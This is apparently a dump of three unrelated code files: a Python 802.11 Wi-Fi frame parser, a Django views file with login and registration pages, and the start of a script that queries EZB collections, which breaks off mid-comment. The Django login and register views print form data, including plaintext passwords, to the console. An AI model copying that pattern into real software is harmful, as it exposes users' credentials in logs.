def get_shark_field(self, fields):
"""get parameters via wireshark syntax.
out = x.get_shark_field('wlan.fc.type')
out = x.get_shark_field(['wlan.fc.type', 'wlan.seq'])
:fields: str or str[]
:return: dict
out[fields[0]] = val[0] or None
out[fields[1]] = val[1] or None ...
"""
keys, exist, out = None, {}, None
if isinstance(fields, str):
fields = [fields]
elif not isinstance(fields, list):
logging.error('invalid input type')
return None
out = dict.fromkeys(fields)
if hasattr(self, '_shark_'):
exist.update(self._shark_)
if hasattr(self, '_s_shark_'):
exist.update(self._s_shark_)
if hasattr(self.radiotap, '_r_shark_'):
exist.update(self.radiotap._r_shark_)
keys = exist.keys()
for elem in fields:
if elem in keys:
obj_field, tmp = exist[elem], None
try:
tmp = operator.attrgetter(obj_field)(self)
except AttributeError:
tmp = None
if not tmp:
try:
tmp = operator.attrgetter(obj_field)(self.radiotap)
except AttributeError:
tmp = None
out[elem] = tmp
return out
@staticmethod
def get_mac_addr(mac_addr):
"""converts bytes to mac addr format
:mac_addr: ctypes.structure
:return: str
mac addr in format
11:22:33:aa:bb:cc
"""
mac_addr = bytearray(mac_addr)
mac = b':'.join([('%02x' % o).encode('ascii') for o in mac_addr])
return mac
def get_hex_repr(self):
"""wlan.fc.type_subtype hex representation
:return: str
"""
return hex(self.category * 16 + self.subtype)
def strip_mac_addrs(self):
"""strip mac address(each 6 byte) information.
(wlan.ta, wlan.ra, wlan.sa, wlan.da)
(transmitter, receiver, source, destination)
:return: int
index of sequence control
:return: int
index after mac addresses
:return: str
source address (sa)
:return: str
transmitter address (ta)
:return: str
receiver address (ra)
:return: str
destination address (da)
:return: str
basic service sed identifier (bssid)
"""
qos_idx, seq_idx = 0, 0
sa, ta, ra, da, bssid = None, None, None, None, None
if self.to_ds == 1 and self.from_ds == 1:
(ra, ta, da) = struct.unpack('!6s6s6s', self._packet[4:22])
sa = struct.unpack('!6s', self._packet[24:30])[0]
qos_idx = 30
seq_idx = 22
elif self.to_ds == 0 and self.from_ds == 1:
(ra, ta, sa) = struct.unpack('!6s6s6s', self._packet[4:22])
qos_idx = 24
seq_idx = 22
elif self.to_ds == 1 and self.from_ds == 0:
(ra, ta, da) = struct.unpack('!6s6s6s', self._packet[4:22])
qos_idx = 24
seq_idx = 22
elif self.to_ds == 0 and self.from_ds == 0:
(ra, ta, bssid) = struct.unpack('!6s6s6s', self._packet[4:22])
qos_idx = 24
seq_idx = 22
if ta is not None:
ta = Wifi.get_mac_addr(ta)
if ra is not None:
ra = Wifi.get_mac_addr(ra)
if sa is not None:
sa = Wifi.get_mac_addr(sa)
if da is not None:
da = Wifi.get_mac_addr(da)
if bssid is not None:
bssid = Wifi.get_mac_addr(bssid)
return seq_idx, qos_idx, sa, ta, ra, da, bssid
def strip_seq_cntrl(self, idx):
"""strip(2 byte) wlan.seq(12 bit) and wlan.fram(4 bit)
number information.
:seq_cntrl: ctypes.Structure
:return: int
sequence number
:return: int
fragment number
"""
seq_cntrl = struct.unpack('H', self._packet[idx:idx + 2])[0]
seq_num = seq_cntrl >> 4
frag_num = seq_cntrl & 0x000f
return seq_num, frag_num
def __repr__(self, show_rfields=True):
"""
:show_rfields: bool
whether to show radiotap fields too.
"""
out_str = ''
all_fields = []
if hasattr(self, '_fields_'):
all_fields += self._fields_
if hasattr(self, '_sfields_'):
all_fields += self._sfields_
if all_fields:
for elem in all_fields:
key = elem[0]
try:
val = operator.attrgetter(key)(self)
except Exception:
val = None
if isinstance(val, list):
if val:
out_str += "{} <list>[{}]\n".format(key, type(val[0]))
else:
out_str += "{} <list>\n".format(str(key))
else:
out_str += "{}: {}\n".format(str(key), str(val))
else:
logging.error('instance does not have any field')
return None
if show_rfields and hasattr(self.radiotap, '_rfields_'):
for elem in self.radiotap._rfields_:
key = elem[0]
try:
val = operator.attrgetter(key)(self.radiotap)
except Exception:
val = None
if val is not None:
out_str += "radiotap.{}: {}\n".format(key, val)
return out_str
class Data(Wifi):
"""Base Data Packet (type: 2)"""
def __init__(self, frame, no_rtap=False):
"""Constructor method.
:packet: ctypes.Structure
:no_rtap: Bool
shall parse radiotap headers
"""
Wifi.__init__(self, frame, no_rtap)
class QosData(Data):
"""Qos Data (type: 2, subtype: 8)"""
_sfields_ = [('sa', ctypes.c_char_p), # source address
('ta', ctypes.c_char_p), # transmitter address
('ra', ctypes.c_char_p), # receiver address
('da', ctypes.c_char_p), # destionation address
('seq_num', ctypes.c_uint), # sequence number
('frag_num', ctypes.c_uint), # fragment number
('qos_pri', ctypes.c_uint), # qualit of service priority
('qos_bit', ctypes.c_bool), # quality of service bit
('qos_ack', ctypes.c_uint), # quality of service ack
('amsdupresent', ctypes.c_bool), # aggregated mac service data unit
('ccmp_extiv', ctypes.c_uint64), # counter mode chiper block
('payload', list)] # payload
# Wireshark syntax conjugates of fields in object (subfield shark)
_s_shark_ = {'wlan.sa': 'sa',
'wlan.ta': 'ta',
'wlan.ra': 'ra',
'wlan.da': 'da',
'wlan.seq': 'seq_num',
'wlan.frag': 'frag_num',
'wlan.qos.priority': 'qos_pri',
'wlan.qos.bit4': 'qos_bit',
'wlan.qos.ack': 'qos_ack',
'wlan.qos.amsdupresent': 'amsdupresent',
'wlan.ccmp.extiv': 'ccmp_extiv'}
def __init__(self, frame, no_rtap=False, parse_amsdu=True):
"""Constructor method.
:frame: ctypes.Structure
:parse_amsdu: Bool
shall parse aggregated mac service data unit
"""
Data.__init__(self, frame, no_rtap)
idx = 0
self.sa = self.ta = self.ra = self.da = None
self.seq_num = self.frag_num = None
self.qos_pri = self.qos_bit = self.qos_ack = None
self.ccmp_extiv = None
self.payload = []
seq_idx, qos_idx, self.sa, self.ta, self.ra, self.da, _ = self.strip_mac_addrs()
self.seq_num, self.frag_num = self.strip_seq_cntrl(seq_idx)
idx = qos_idx
incr, self.qos_pri, self.qos_bit, self.qos_ack, self.amsdupresent =\
self.strip_qos_cntrl(idx, self.radiotap.prot_type)
idx += incr
if self.wep == 1:
incr, self.ccmp_extiv = self.strip_ccmp(idx)
idx += incr
if parse_amsdu:
if self.amsdupresent != 0 and self.wep == 0:
while idx < len(self._packet):
msdu, offset = self.strip_msdu(idx)
self.payload.append(msdu)
idx += offset
else:
if self.wep == 0:
msdu = {}
offset, llc = self.strip_llc(idx)
msdu['llc'] = llc
msdu['payload'] = self._packet[idx + offset:]
self.payload.append(msdu)
else:
self.payload.append({'payload': self._packet[idx:]})
def strip_qos_cntrl(self, idx, prot_type):
"""strip(2 byte) wlan.qos
:idx: int
:prot_type: string
802.11 protocol type(.11ac, .11a, .11n, etc)
:return: int
number of processed bytes
:return: int
qos priority
:return: int
qos bit
:return: int
qos acknowledgement
:return: int
amsdupresent(aggregated mac service data unit)
"""
qos_cntrl, = struct.unpack('H', self._packet[idx:idx + 2])
qos_cntrl_bits = format(qos_cntrl, '016b')[::-1]
qos_pri = qos_cntrl & 0x000f
qos_bit = int(qos_cntrl_bits[5])
qos_ack = int(qos_cntrl_bits[6:8], 2)
amsdupresent = 0
if prot_type == '.11ac':
amsdupresent = int(qos_cntrl_bits[7])
return 2, qos_pri, qos_bit, qos_ack, amsdupresent
def strip_ccmp(self, idx):
"""strip(8 byte) wlan.ccmp.extiv
CCMP Extended Initialization Vector
:return: int
number of processed bytes
:return: ctypes.raw
ccmp vector
"""
ccmp_extiv = None
if len(self._packet[idx:]) >= 8:
raw_bytes = self._packet[idx:idx + 8]
ccmp_extiv, = struct.unpack_from('Q', raw_bytes, 0)
return 8, ccmp_extiv
def strip_msdu(self, idx):
"""strip single mac servis data unit(msdu)
see -> https://mrncciew.com/2014/11/01/cwap-802-11-data-frame-aggregation/
:idx: int
:return: dict
msdu
:return: int
number of processed bytes
"""
# length of msdu payload has to be multiple of 4,
# this guaranteed with padding
padding = 0
len_payload = 0
msdu = {
'llc': {},
'wlan.da': None,
'wlan.sa': None,
'payload': None,
'length': 0
}
(da_mac, sa_mac) = struct.unpack('!6s6s', self._packet[idx:idx + 12])
msdu['wlan.da'] = Wifi.get_mac_addr(da_mac)
msdu['wlan.sa'] = Wifi.get_mac_addr(sa_mac)
idx += 12
msdu['length'] = struct.unpack('!H', self._packet[idx:idx + 2])[0]
idx += 2
offset, msdu['llc'] = self.strip_llc(idx)
idx += offset
len_payload = msdu['length'] - offset
msdu['payload'] = self._packet[idx:idx + len_payload]
padding = 4 - (len_payload % 4)
return msdu, msdu['length'] + padding + 12
def strip_llc(self, idx):
"""strip(4 or 8 byte) logical link control headers
:return: int
number of processed bytes
:return: dict
llc information
see -> http://www.wildpackets.com/resources/compendium/ethernet/frame_snap_iee8023
ABBRVS.
ssap: source service access point
dsap: destination service access point
SNAP(Subnetwork Acess Protocol)
"""
llc = {}
snap = 170
llc_dsap = struct.unpack('B', self._packet[idx:idx + 1])[0]
llc['dsap.dsap'] = llc_dsap >> 1
llc['dsap.ig'] = llc_dsap & 0b01
idx += 1
llc_ssap = struct.unpack('B', self._packet[idx:idx + 1])[0]
llc['ssap.sap'] = llc_ssap >> 1
llc['ssap.cr'] = llc_ssap & 0b01
idx += 1
if llc_dsap == snap and llc_ssap == snap:
llc_control = struct.unpack('B', self._packet[idx:idx + 1])[0]
llc['control.u_modifier_cmd'] = llc_control >> 2
llc['control.ftype'] = llc_control & 0x03
idx += 1
llc['organization_code'] = self._packet[idx:idx + 3]
idx += 3
llc['type'] = self._packet[idx:idx + 2]
return 8, llc
else:
return 4, llc
def __str__(self):
frame = "%s (sa: %s, ta: %s, ra: %s, da: %s, ds: %s, seq: %s)"
frame = frame % (self.name, self.sa, self.ta, self.ra, self.da, self.ds, self.seq_num)
return frame
class Management(Wifi):
"""Management Packet (type: 0)"""
# commonly exists in some of the subtypes
_capabilities_ = [('ess', ctypes.c_bool), # extended service set
('ibss', ctypes.c_bool), # indepent service set
('priv', ctypes.c_bool), # privacy
('short_pre', ctypes.c_bool), # short preamble
('pbcc', ctypes.c_bool), # packet binary convolutional code
('chan_agility', ctypes.c_bool), # channel agility
('spec_man', ctypes.c_bool), # spectrum management
('short_slot', ctypes.c_bool), # short slot time
('apsd', ctypes.c_bool), # automatic power save delivery
('radio_meas', ctypes.c_bool), # radio measurement
('dss_ofdm', ctypes.c_bool), # direct spread spectrum
('del_back', ctypes.c_bool), # delayed block acknowledgement
('imm_back', ctypes.c_bool)] # immediate block acknowledgement
_scapabilities_ = {'wlan_mgt.fixed.capabilities.ess': 'ess',
'wlan_mgt.fixed.capabilities.ibss': 'ibss',
'wlan_mgt.fixed.capabilities.priv': 'priv',
'wlan_mgt.fixed.capabilities.preamble': 'short_pre',
'wlan_mgt.fixed.capabilities.pbcc': 'pbcc',
'wlan_mgt.fixed.capabilities.agility': 'chan_agility',
'wlan_mgt.fixed.capabilities.spec_man': 'spec_man',
'wlan_mgt.fixed.capabilities.short_slot_time': 'short_slot',
'wlan_mgt.fixed.capabilities.apsd': 'apsd',
'wlan_mgt.fixed.capabilities.radio_measurement': 'radio_meas',
'wlan_mgt.fixed.capabilities.dss_ofdm': 'dss_ofdm',
'wlan_mgt.fixed.capabilities.del_blk_ack': 'del_back',
'wlan_mgt.fixed_capabilities.imm_blk_ack': 'imm_back'}
def __init__(self, frame, no_rtap=False):
"""Constructor Method
:frame: ctypes.Structure
:subtype: int
"""
Wifi.__init__(self, frame, no_rtap)
self.tagged_params = []
self._raw_tagged_params = None
self.timestamp = None
self.interval = None
self.fixed_capabils = None
def __str__(self):
return self.name
@staticmethod
def parse_tagged_params(raw_tagged_params):
"""strip tagged information elements wlan_mgt.tag
which has generic type-length-value structure
[type, length, value]
type(1 byte), length(1 byte), value(varies)
[wlan_mgt.tag.number, wlan_mgt.tag.length, payload]
structured fields.
:return: dict[]
list of tagged params
:return: int
0 in succ, 1 for
"""
fcs_len = 4 # wlan.fcs (4 bytes)
idx = 0
tagged_params = []
while idx < len(raw_tagged_params) - fcs_len:
tag_num, tag_len = struct.unpack('BB', raw_tagged_params[idx:idx + 2])
idx += 2
if len(raw_tagged_params) >= idx + tag_len:
param = {}
param['number'], param['length'] = tag_num, tag_len
payload = raw_tagged_params[idx:idx + tag_len]
if tag_num in MNGMT_TAGS:
param['name'] = MNGMT_TAGS[tag_num]
if MNGMT_TAGS[tag_num] == 'TAG_VENDOR_SPECIFIC_IE':
param['payload'] = Management.parse_vendor_ie(payload)
else:
param['payload'] = payload
else:
param['name'] = None
tagged_params.append(param)
idx += tag_len
else:
logging.warning('out tag length header points out of boundary')
log_msg = 'index: {p_idx}, pack_len: {p_len}'
log_msg = log_msg.format(p_idx=idx + tag_len,
p_len=len(raw_tagged_params))
logging.warning(log_msg)
return 1, tagged_params
return 0, tagged_params
@staticmethod
def get_fixed_capabils(payload):
"""strip(2 byte) wlan_mgt.fixed.capabilities
:payload: ctypes.structure
2 byte
:return: dict
None in error
"""
if len(payload) != 2:
return None
capabils = {}
fix_cap = struct.unpack('H', payload)[0]
cap_bits = format(fix_cap, '016b')[::-1]
capabils['ess'] = int(cap_bits[0]) # Extended Service Set
capabils['ibss'] = int(cap_bits[1]) # Independent Basic Service Set
capabils['priv'] = int(cap_bits[4]) # Privacy
capabils['short_preamble'] = int(cap_bits[5]) # Short Preamble
capabils['pbcc'] = int(cap_bits[6]) # Packet Binary Convolutional Code
capabils['chan_agility'] = int(cap_bits[7]) # Channel Agility
capabils['spec_man'] = int(cap_bits[8]) # Spectrum Management
capabils['short_slot'] = int(cap_bits[10]) # Short Slot Time
capabils['apsd'] = int(cap_bits[11]) # Automatic Power Save Delivery
capabils['radio_meas'] = int(cap_bits[12]) # Radio Measurement
capabils['dss_ofdm'] = int(cap_bits[13]) # Direct Spread Spectrum
capabils['del_back'] = int(cap_bits[14]) # Delayed Block Acknowledgement
capabils['imm_back'] = int(cap_bits[15]) # Immediate Block Acknowledgement
return capabils
@staticmethod
def parse_vendor_ie(payload):
"""parse vendor specific information element
oui -> organizationally unique identifier
first 3 bytes of mac addresses
see:https://www.wireshark.org/tools/oui-lookup.html
strip wlan_mgt.tag.oui(3 bytes),
wlan_mgt.tag.vendor.oui.type(1 byte)
wlan_mgt.tag.vendor.data (varies)
:payload: ctypes.structure
:return: dict
{'oui':00-11-22, 'oui_type':1, 'oui_data':ctypes.structure}
"""
output = {}
oui = struct.unpack('BBB', payload[0:3])
oui = b'-'.join([('%02x' % o).encode('ascii') for o in oui])
oui_type = struct.unpack('B', payload[3:4])[0]
oui_data = payload[4:]
output['oui'] = oui.upper()
output['oui_type'] = oui_type
output['oui_data'] = oui_data
return output
@staticmethod
def get_timestamp(payload):
"""strip wlan_mgt.fixed.timestamp(8 bytes)
:payload: ctypes.structure
:return: int
None on error
"""
if len(payload) != 8:
return None
timestamp = struct.unpack('Q', payload)[0]
return timestamp
@staticmethod
def get_interval(payload):
"""strip wlan_mgt.fixed.beacoN(2 bytes)
beacon interval
:payload: ctypes.structure
:return: int
None on error
"""
if len(payload) != 2:
return None
interval = struct.unpack('H', payload)[0]
return interval
@staticmethod
def strip_fixed_params(payload):
"""strip(12 byte) wlan_mgt.fixed.all
:payload: ctypes.structure
:return: int
timestamp
:return: int
beacon interval
:return: dict
capabilities
"""
if len(payload) != 12:
return None, None, None
idx = 0
timestamp = Management.get_timestamp(payload[idx:idx + 8])
idx += 8
interval = Management.get_interval(payload[idx:idx + 2])
idx += 2
capabils = Management.get_fixed_capabils(payload[idx:idx + 2])
return timestamp, interval, capabils
@staticmethod
def is_valid_mac_oui(mac_block):
"""checks whether mac block is in format of
00-11-22 or 00:11:22.
:return: int
"""
if len(mac_block) != 8:
return 0
if ':' in mac_block:
if len(mac_block.split(':')) != 3:
return 0
elif '-' in mac_block:
if len(mac_block.split('-')) != 3:
return 0
return 1
def set_fixed_capabils(self, capabils):
"""set keys of capabils into fields of object
:capabils: dict
"""
self.ess = capabils['ess']
self.ibss = capabils['ibss']
self.priv = capabils['priv']
self.short_preamble = capabils['short_preamble']
self.pbcc = capabils['pbcc']
self.chan_agility = capabils['chan_agility']
self.spec_man = capabils['spec_man']
self.short_slot = capabils['short_slot']
self.apsd = capabils['apsd']
self.radio_meas = capabils['radio_meas']
self.dss_ofdm = capabils['dss_ofdm']
self.del_back = capabils['del_back']
self.imm_back = capabils['imm_back']
def get_vendor_ies(self, mac_block=None, oui_type=None):
"""vendor information element querying
:mac_block: str
first 3 bytes of mac addresses in format of
00-11-22 or 00:11:22 or 001122
:oui_type: int
vendors ie type
:return: int
is valid mac_block format
-1 is unknown
:return: dict[]
list of oui information elements
-1 on error (invalid v
"""
vendor_ies = []
if mac_block is not None:
if Management.is_valid_mac_oui(mac_block):
mac_block = mac_block.upper()
if ':' in mac_block:
mac_block.replace(':', '-')
else:
logging.warning("invalid oui macblock")
return None
for elem in self.tagged_params:
tag_num = elem['number']
if MNGMT_TAGS[tag_num] == 'TAG_VENDOR_SPECIFIC_IE':
if mac_block is None:
vendor_ies.append(elem)
elif elem['payload']['oui'] == mac_block.encode('ascii'):
if oui_type is None:
vendor_ies.append(elem)
elif elem['payload']['oui_type'] == oui_type:
vendor_ies.append(elem)
return vendor_ies
class ProbeResp(Management):
"""Probe Response (type: 0, subtype: 5)"""
_sfields_ = [('ra', ctypes.c_char_p), # receiver address
('ta', ctypes.c_char_p), # transmitter address
('bssid', ctypes.c_char_p), # basic service set identifier
('frag_num', ctypes.c_uint), # fragment number
('seq_num', ctypes.c_uint), # sequence number
('timestamp', ctypes.c_uint64), # timestamp
('interval', ctypes.c_uint), # interval
('tagged_params', list)] # tagged parameters
# Wireshark syntax conjugates of fields in object (subfield shark)
_s_shark_ = {'wlan.ta': 'ta',
'wlan.ra': 'ra',
'wlan.bssid': 'bssid',
'wlan.frag': 'frag_num',
'wlan.seq': 'seq_num',
'wlan_mgt.fixed.timestamp': 'timestamp',
'wlan_mgt.fixed.beacon': 'interval',
'wlan_mgt.tagged.all': 'tagged_params'}
_sfields_ += Management._capabilities_
_s_shark_.update(Management._scapabilities_)
def __init__(self, frame, no_rtap=False):
"""
"""
Management.__init__(self, frame, no_rtap)
idx = 0
self.ta = self.ra = self.bssid = None
self.seq_num = self.frag_num = None
self.timestamp = self.interval = None
# fixed capability fields
self.ess = self.ibss = None
self.privacy = None
self.priv = self.short_pre = self.pbcc = self.chan_agility = None
self.spec_man = self.short_slot = self.apsd = self.radio_meas = None
self.dss_ofdm = self.del_back = self.imm_back = None
seq_idx, _, _, self.ta, self.ra, _, self.bssid = self.strip_mac_addrs()
idx = seq_idx
self.seq_num, self.frag_num = self.strip_seq_cntrl(idx)
idx += 2
payload = self._packet[idx:idx + 12]
timestamp, interval, fixed_capabils = self.strip_fixed_params(payload)
if all([timestamp, interval, fixed_capabils]):
self.timestamp = timestamp
self.interval = interval
self.set_fixed_capabils(fixed_capabils)
idx += 12
else:
logging.error("failed to parse fixed parameters")
return
if idx < len(self._packet):
self._raw_tagged_params = self._packet[idx:]
is_out_bound, tagged_params = self.parse_tagged_params(self._raw_tagged_params)
if len(tagged_params):
self.tagged_params = tagged_params
if is_out_bound:
logging.error("tag_len header not matched with raw byte counts")
class ProbeReq(Management):
"""Probe Request (type: 0, subtype:4)"""
_sfields_ = [('ra', ctypes.c_char_p), # receiver address
('ta', ctypes.c_char_p), # transmitter address
('bssid', ctypes.c_char_p), # basic service set identifier
('frag_num', ctypes.c_uint), # fragment number
('seq_num', ctypes.c_uint), # sequence number
('tagged_params', list)] # tagged parameters
_s_shark_ = {'wlan.ra': 'ra',
'wlan.ta': 'ta',
'wlan.bssid': 'bssid',
'wlan.frag': 'frag_num',
'wlan.seq': 'seq_num',
'wlan_mgt.tagged.all': 'tagged_params'}
def __init__(self, frame, no_rtap=False):
"""
"""
Management.__init__(self, frame, no_rtap)
idx = 0
self.ta = self.ra = self.bssid = None
self.seq_num = self.frag_num = None
seq_idx, _, _, self.ta, self.ra, _, self.bssid = self.strip_mac_addrs()
idx = seq_idx
self.seq_num, self.frag_num = self.strip_seq_cntrl(idx)
idx += 2
if idx < len(self._packet):
self._raw_tagged_params = self._packet[idx:]
is_out_bound, tagged_params = self.parse_tagged_params(self._raw_tagged_params)
if len(tagged_params):
self.tagged_params = tagged_params
if is_out_bound:
logging.error("tag_len header not matched with raw byte counts")
class Beacon(Management):
"""Beacon (type: 0, subtype: 0)"""
_sfields_ = [('ra', ctypes.c_char_p), # receiver address
('ta', ctypes.c_char_p), # transmitter address
('bssid', ctypes.c_char_p), # basic service set identifier
('frag_num', ctypes.c_uint), # fragment number
('seq_num', ctypes.c_uint), # sequence number
('timestamp', ctypes.c_uint64), # timestamp
('interval', ctypes.c_uint), # interval
('tagged_params', list)] # tagged parameters
# Wireshark syntax conjugates of fields in object (subfield shark)
_s_shark_ = {'wlan.ta': 'ta',
'wlan.ra': 'ra',
'wlan.bssid': 'bssid',
'wlan.frag': 'frag_num',
'wlan.seq': 'seq_num',
'wlan_mgt.fixed.timestamp': 'timestamp',
'wlan_mgt.fixed.beacon': 'interval',
'wlan_mgt.tagged.all': 'tagged_params'}
_sfields_ += Management._capabilities_
_s_shark_.update(Management._scapabilities_)
def __init__(self, frame, no_rtap=False):
"""Constructor method.
:frame: ctypes.Structure
"""
Management.__init__(self, frame, no_rtap)
idx = 0
self.timestamp = self.interval = None
self.ta = self.ra = self.bssid = None
self.seq_num = self.frag_num = None
# fixed capability fields
self.ess = self.ibss = None
self.privacy = None
self.priv = self.short_preamble = self.pbcc = self.chan_agility = None
self.spec_man = self.short_slot = self.apsd = self.radio_meas = None
self.dss_ofdm = self.del_back = self.imm_back = None
seq_idx, _, _, self.ta, self.ra, _, self.bssid = self.strip_mac_addrs()
idx = seq_idx
self.seq_num, self.frag_num = self.strip_seq_cntrl(idx)
idx += 2
payload = self._packet[idx:idx + 12]
timestamp, interval, fixed_capabils = self.strip_fixed_params(payload)
if all([timestamp, interval, fixed_capabils]):
self.timestamp = timestamp
self.interval = interval
self.set_fixed_capabils(fixed_capabils)
idx += 12
else:
logging.warning("failed to parse fixed parameters")
return
if idx < len(self._packet):
self._raw_tagged_params = self._packet[idx:]
is_out_bound, tagged_params = self.parse_tagged_params(self._raw_tagged_params)
if len(tagged_params):
self.tagged_params = tagged_params
if is_out_bound:
logging.warning("tag_len header not matched with raw byte counts")
def __str__(self):
frame = "%s from %s (tstamp: %d, interval: %d)"
frame = frame % (self.name, self.bssid, self.timestamp, self.interval)
return frame
class Control(Wifi):
"""Control Frames (type: 1)"""
def __init__(self, frame, no_rtap=False):
"""Constructor method.
:frame: ctypes.Structure
"""
Wifi.__init__(self, frame, no_rtap)
def __str__(self):
return self.name
class RTS(Control):
"""Request to Send Frame (type: 1, subtype: 1)"""
_sfields_ = [('ta', ctypes.c_char_p), # transmitter address
('ra', ctypes.c_char_p)] # receiver address
# Wireshark syntax conjugates of fields in object (subfield shark)
_s_shark_ = {'wlan.ta': 'ta',
'wlan.ra': 'ra'}
def __init__(self, frame, no_rtap=False):
"""Constructor method.
:frame: ctypes.Structure
"""
Control.__init__(self, frame, no_rtap)
(ra_mac, ta_mac) = struct.unpack('!6s6s', self._packet[4:16])
self.ra = Wifi.get_mac_addr(ra_mac)
self.ta = Wifi.get_mac_addr(ta_mac)
def __str__(self):
frame = '%s from %s to %s (duration: %d us)'
frame = frame % (self.name, self.ta, self.ra, self.duration)
return frame
class CTS(Control):
"""Clear to Send Frame (type: 1, subtype: 2)"""
_sfields_ = [('ra', ctypes.c_char_p)] # receiver address -> wlan.ra
# Wireshark syntax conjugates of fields in object (subfield shark)
_s_shark_ = {'wlan.ra': 'ra'}
def __init__(self, frame, no_rtap=False):
"""Constructor method.
:frame: ctypes.Structure
"""
Control.__init__(self, frame, no_rtap)
ra_mac = struct.unpack('!6s', self._packet[4:10])[0]
self.ra = Wifi.get_mac_addr(ra_mac)
def __str__(self):
frame = '%s to %s (duration: %d us)'
frame = frame % (self.name, self.ra, self.duration)
return frame
class BACK(Control):
_sfields_ = [('ra', ctypes.c_char_p), # receiver address
('ta', ctypes.c_char_p), # transmitter address
('ackpolicy', ctypes.c_bool), # acknowledgement policy
('multitid', ctypes.c_bool), # multiple traffic identifier
('ssc_frag', ctypes.c_uint), # starting sequence number fragment
('ssc_seq', ctypes.c_uint), # starting sequence number
('bitmap_str', ctypes.c_char_p), # bitmap string -> in wlan.ba.bm
('acked_seqs', list)] # acknowledged strings -> in wlan.ba.bm and wlan_mgt.fixed.ssc.sequence
# Wireshark syntax conjugates of fields in object (subfield shark)
_s_shark_ = {'wlan.ra': 'ra',
'wlan.ta': 'ta',
'wlan.ba.control.ackpolicy': 'ackpolicy',
'wlan.ba.control.multitid': 'multitid',
'wlan_mgt.fixed.ssc.fragment': 'ssc_frag',
'wlan_mgt.ssc.sequence': 'ssc_seq'}
"""Block Acknowledgement Frame (type: 1, subtype: 9)"""
def __init__(self, frame, no_rtap=False):
"""Constructor method.
:frame: ctypes.Structure
"""
Control.__init__(self, frame, no_rtap)
(ra_mac, ta_mac) = struct.unpack('!6s6s', self._packet[4:16])
self.ra = self.ta = None
self.ackpolicy = self.multitid = None
self.ssc_frag = self.ssc_seq = None
self.bitmap_str = None
self.acked_seqs = []
self.ra = Wifi.get_mac_addr(ra_mac)
self.ta = Wifi.get_mac_addr(ta_mac)
idx = 16
payload = self._packet[idx:idx + 2]
self.ackpolicy, self.multitid = BACK.strip_cntrl(payload)
idx += 2
payload = self._packet[idx:idx + 2]
self.ssc_seq, self.ssc_frag = BACK.strip_ssc(payload)
idx += 2
payload = self._packet[idx:idx + 8]
self.bitmap_str = BACK.strip_bitmap_str(payload)
idx += 8
self.acked_seqs = BACK.extract_acked_seqs(self.bitmap_str, self.ssc_seq)
def get_shark_field(self, fields):
"""
:fields: str[]
"""
out = super(BACK, self).get_shark_field(fields)
out.update({'acked_seqs': self.acked_seqs,
'bitmap_str': self.bitmap_str})
return out
@staticmethod
def strip_cntrl(payload):
"""strip(2 byte) wlan.ba.control
:payload: ctypes.structure
:return: int
multitid (tid: traffic indicator)
:return: int
ackpolicy
"""
cntrl = struct.unpack('H', payload)[0]
cntrl_bits = format(cntrl, '016b')[::-1]
ackpolicy = int(cntrl_bits[0])
multitid = int(cntrl_bits[1])
return ackpolicy, multitid
@staticmethod
def strip_ssc(payload):
"""strip(2 byte) wlan_mgt.fixed.ssc
:payload: ctypes.structure
:return: int
ssc_seq (starting sequence control sequence)
:return: int
ssc_frag (starting sequence control fragment number)
"""
ssc = struct.unpack('H', payload)[0]
ssc_seq = ssc >> 4
ssc_frag = ssc & 0x000f
return ssc_seq, ssc_frag
@staticmethod
def strip_bitmap_str(payload):
"""strip(8 byte) wlan.ba.bm
:payload: ctypes.structure
:return: str
bitmap
"""
bitmap = struct.unpack('BBBBBBBB', payload)
bitmap_str = ''
for elem in bitmap:
bitmap_str += format(elem, '08b')[::-1]
return bitmap_str
@staticmethod
def extract_acked_seqs(bitmap, ssc_seq):
"""extracts acknowledged sequences from bitmap and
starting sequence number.
:bitmap: str
:ssc_seq: int
:return: int[]
acknowledged sequence numbers
"""
acked_seqs = []
for idx, val in enumerate(bitmap):
if int(val) == 1:
seq = (ssc_seq + idx) % 4096
acked_seqs.append(seq)
return acked_seqs
def __str__(self):
frame = '%s from %s to %s (starting seq: %d, num_acked: %d)'
frame = frame % (self.name, self.ta, self.ra,
self.ssc_seq, len(self.acked_seqs))
return frame
class Unknown(Wifi):
"""
un-identified packet
"""
def __init__(self, frame, no_rtap):
Wifi.__init__(self, frame, no_rtap)
self.name = "Unkown"
|
py | 1a3f89a636c8e244e089013340c4d435cdebe456 | from django.contrib.auth import authenticate, login, get_user_model
from django.shortcuts import render, redirect
from django.http import HttpResponse
from .forms import ContactForm, LoginForm, RegisterForm
def home_page(request):
context = {
"title": "Hello, I am Anil Choudhary.",
"content": "Welcome to the Homepage.",
}
if request.user.is_authenticated:
context['premium_content'] = "you are awesome"
return render(request, "home_page.html", context)
def about_page(request):
context = {
"title": "About page",
"content": "Welcome to the about page"
}
return render(request, "home_page.html", context)
def contact_page(request):
contact_form = ContactForm(request.POST or None)
context = {
"title": "Contact page",
"content": "Welcome to the contact page",
"form": contact_form
}
if contact_form.is_valid():
print(contact_form.cleaned_data)
# if request.method == "POST":
# # print(request.POST)
# print(request.POST.get('fullname'))
# print(request.POST.get('email'))
# print(request.POST.get('content'))
return render(request, "contact/view.html", context)
def login_page(request):
form = LoginForm(request.POST or None)
context = {
"form": form
}
print("user logged in?")
print(request.user.is_authenticated)
if form.is_valid():
print(form.cleaned_data)
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user = authenticate(request, username=username, password=password)
print(request.user.is_authenticated)
if user is not None:
print(request.user.is_authenticated)
login(request, user)
# context['form'] = LoginForm()
return redirect("/")
else:
print("Please, register with us")
return render(request, "auth/login.html", context)
User = get_user_model()
def register_page(request):
form = RegisterForm(request.POST or None)
context = {
'form': form,
}
if form.is_valid():
print(form.cleaned_data)
username = form.cleaned_data['username']
email = form.cleaned_data['email']
password = form.cleaned_data['password']
new_user = User.objects.create_user(username, email, password)
print(new_user)
return render(request, "auth/register.html", context)
def shop_page(request):
context = {
"title": "Shop page",
"content": "Welcome to the shop page"
}
return render(request, "home_page.html", context)
|
py | 1a3f8b275037cde1c338fbf02cdda190b073025a | import json
import pandas as pd
import numpy as np
import requests
from cleanup import bubi_coredata
try:
from BeautifulSoup import BeautifulSoup
except ImportError:
from bs4 import BeautifulSoup
# ruft die collection id für einen collection-Eintrag ab
def get_ezb_id(collection):
# falls keine collection angegeben, ein leeres Feld zurückgeben
if collection == '':
return ''
# die URL zur ezb bilden
url = 'https://ezb.ur.de/api/collections/' + collection
# Seite abrufen
request = requests.get(url)
# wenn die Abfrage erfolgreich war (status = 200) dann die Werte auslesen
if request.status_code == 200:
# den Inhalt der Seite (=request.content) mit BeutifulSoup
